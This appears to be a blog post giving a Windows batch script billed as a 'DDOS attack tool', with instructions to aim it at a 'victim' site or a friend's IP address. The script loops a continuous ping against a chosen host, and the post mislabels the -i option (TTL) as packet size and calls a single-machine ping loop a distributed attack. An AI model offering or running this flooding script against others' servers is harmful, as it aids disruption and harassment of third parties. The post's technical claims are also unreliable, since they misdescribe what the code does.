Make DDOS Attack Tool With Notepad | How To Create DDOS attack Tool


Here I just wanted to share knowledge with you how to make
application DDOS (Distributed Denial of Service) with the help of a batch file ..
Something we need to do as followng.
.

1.Open Notepad

2.Copy this script into notepad


Code:

@echo off
mode 67,16
title DDOS Attack
color 05
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS Bayu Ae
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Apa-Targer Loe:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=Ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Serang Server %m%
ping %m% -i %n% -t >nul
goto DDOS




3.save as batchfile.
Exam:DDOS.bat 



How to Use

On-Target Server input menu
web address / Ip your friend that you want to DDOS
for example like this:


Right 2 click to open that batch file..

Get in victim site 




get Victim IP




And then input the results of the ping IP in the host and
Packet Size for it to send the number of bytes to be
Size size up to you
for example like this



then press "ENTER" result like this




if you like the picture above means the process of DDOSsuccessfully on the runyou want to DDOS depending on how long.      
      Happy Hacking Please Like Or Share The Post Or Dont Forget To Comment

Comments